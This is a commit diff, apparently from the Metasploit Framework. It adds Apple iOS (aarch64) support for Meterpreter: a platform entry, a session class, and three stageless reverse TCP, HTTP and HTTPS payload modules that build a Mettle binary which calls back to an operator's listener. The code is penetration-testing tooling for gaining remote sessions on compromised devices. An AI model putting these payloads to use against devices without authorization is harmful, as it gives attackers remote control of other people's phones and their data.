iOS meterpreter
parent
d79b0ad981
commit
c4e20e01e3
|
@ -0,0 +1,29 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
require 'msf/base/sessions/meterpreter'
|
||||
|
||||
module Msf
|
||||
module Sessions
|
||||
|
||||
###
|
||||
#
|
||||
# This class creates a platform-specific meterpreter session type
|
||||
#
|
||||
###
|
||||
class Meterpreter_aarch64_Apple_iOS < Msf::Sessions::Meterpreter
|
||||
def supports_ssl?
|
||||
false
|
||||
end
|
||||
def supports_zlib?
|
||||
false
|
||||
end
|
||||
def initialize(rstream, opts={})
|
||||
super
|
||||
self.base_platform = 'apple_ios'
|
||||
self.base_arch = ARCH_AARCH64
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
|
@ -560,4 +560,12 @@ class Msf::Module::Platform
|
|||
Alias = "hardware"
|
||||
end
|
||||
|
||||
#
|
||||
# Apple iOS
|
||||
#
|
||||
class Apple_iOS < Msf::Module::Platform
|
||||
Rank = 100
|
||||
Alias = "apple_ios"
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -72,7 +72,8 @@ class Msf::Payload::UUID
|
|||
21 => 'python',
|
||||
22 => 'nodejs',
|
||||
23 => 'firefox',
|
||||
24 => 'r'
|
||||
24 => 'r',
|
||||
25 => 'apple_ios',
|
||||
}
|
||||
|
||||
# The raw length of the UUID structure
|
||||
|
|
|
@ -30,7 +30,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'BadChars' => '',
|
||||
'DisableNops' => true
|
||||
},
|
||||
'Platform' => %w[android bsd java js linux osx nodejs php python ruby solaris unix win mainframe multi],
|
||||
'Platform' => %w[android apple_ios bsd java js linux osx nodejs php python ruby solaris unix win mainframe multi],
|
||||
'Arch' => ARCH_ALL,
|
||||
'Targets' => [ [ 'Wildcard Target', {} ] ],
|
||||
'DefaultTarget' => 0,
|
||||
|
|
|
@ -0,0 +1,44 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core/handler/reverse_http'
|
||||
require 'msf/base/sessions/meterpreter_options'
|
||||
require 'msf/base/sessions/mettle_config'
|
||||
require 'msf/base/sessions/meterpreter_aarch64_apple_ios'
|
||||
|
||||
module MetasploitModule
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
include Msf::Sessions::MettleConfig
|
||||
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'Apple_iOS Meterpreter, Reverse HTTP Inline',
|
||||
'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
|
||||
'Author' => [
|
||||
'Adam Cammack <adam_cammack[at]rapid7.com>',
|
||||
'Brent Cook <brent_cook[at]rapid7.com>',
|
||||
'timwr'
|
||||
],
|
||||
'Platform' => 'apple_ios',
|
||||
'Arch' => ARCH_AARCH64,
|
||||
'License' => MSF_LICENSE,
|
||||
'Handler' => Msf::Handler::ReverseHttp,
|
||||
'Session' => Msf::Sessions::Meterpreter_aarch64_Apple_iOS
|
||||
)
|
||||
)
|
||||
end
|
||||
|
||||
def generate
|
||||
opts = {
|
||||
scheme: 'http',
|
||||
stageless: true
|
||||
}
|
||||
MetasploitPayloads::Mettle.new('aarch64-iphone-darwin', generate_config(opts)).to_binary :exec
|
||||
end
|
||||
end
|
|
@ -0,0 +1,44 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core/handler/reverse_https'
|
||||
require 'msf/base/sessions/meterpreter_options'
|
||||
require 'msf/base/sessions/mettle_config'
|
||||
require 'msf/base/sessions/meterpreter_aarch64_apple_ios'
|
||||
|
||||
module MetasploitModule
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
include Msf::Sessions::MettleConfig
|
||||
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'Apple_iOS Meterpreter, Reverse HTTPS Inline',
|
||||
'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
|
||||
'Author' => [
|
||||
'Adam Cammack <adam_cammack[at]rapid7.com>',
|
||||
'Brent Cook <brent_cook[at]rapid7.com>',
|
||||
'timwr'
|
||||
],
|
||||
'Platform' => 'apple_ios',
|
||||
'Arch' => ARCH_AARCH64,
|
||||
'License' => MSF_LICENSE,
|
||||
'Handler' => Msf::Handler::ReverseHttps,
|
||||
'Session' => Msf::Sessions::Meterpreter_aarch64_Apple_iOS
|
||||
)
|
||||
)
|
||||
end
|
||||
|
||||
def generate
|
||||
opts = {
|
||||
scheme: 'https',
|
||||
stageless: true
|
||||
}
|
||||
MetasploitPayloads::Mettle.new('aarch64-iphone-darwin', generate_config(opts)).to_binary :exec
|
||||
end
|
||||
end
|
|
@ -0,0 +1,44 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core/handler/reverse_tcp'
|
||||
require 'msf/base/sessions/meterpreter_options'
|
||||
require 'msf/base/sessions/mettle_config'
|
||||
require 'msf/base/sessions/meterpreter_aarch64_apple_ios'
|
||||
|
||||
module MetasploitModule
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
include Msf::Sessions::MettleConfig
|
||||
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'Apple_iOS Meterpreter, Reverse TCP Inline',
|
||||
'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
|
||||
'Author' => [
|
||||
'Adam Cammack <adam_cammack[at]rapid7.com>',
|
||||
'Brent Cook <brent_cook[at]rapid7.com>',
|
||||
'timwr'
|
||||
],
|
||||
'Platform' => 'apple_ios',
|
||||
'Arch' => ARCH_AARCH64,
|
||||
'License' => MSF_LICENSE,
|
||||
'Handler' => Msf::Handler::ReverseTcp,
|
||||
'Session' => Msf::Sessions::Meterpreter_aarch64_Apple_iOS
|
||||
)
|
||||
)
|
||||
end
|
||||
|
||||
def generate
|
||||
opts = {
|
||||
scheme: 'tcp',
|
||||
stageless: true
|
||||
}
|
||||
MetasploitPayloads::Mettle.new('aarch64-iphone-darwin', generate_config(opts)).to_binary :exec
|
||||
end
|
||||
end
|
|
@ -25,6 +25,7 @@ arches = [
|
|||
['x86', 'Linux', 'i486-linux-musl'],
|
||||
['zarch', 'Linux', 's390x-linux-musl'],
|
||||
['x64', 'OSX', 'x86_64-apple-darwin'],
|
||||
['aarch64', 'Apple_iOS', 'aarch64-iphone-darwin'],
|
||||
]
|
||||
|
||||
arch = ''
|
||||
|
@ -42,7 +43,7 @@ arches.each do |a, pl, pa|
|
|||
|
||||
template = File::read(File::join(cwd, "meterpreter_reverse.erb"))
|
||||
renderer = ERB.new(template)
|
||||
filename = File::join('modules', 'payloads', 'singles', platform, arch, "meterpreter_reverse_#{scheme}.rb")
|
||||
filename = File::join('modules', 'payloads', 'singles', platform.downcase, arch, "meterpreter_reverse_#{scheme}.rb")
|
||||
File::write(filename, renderer.result())
|
||||
end
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue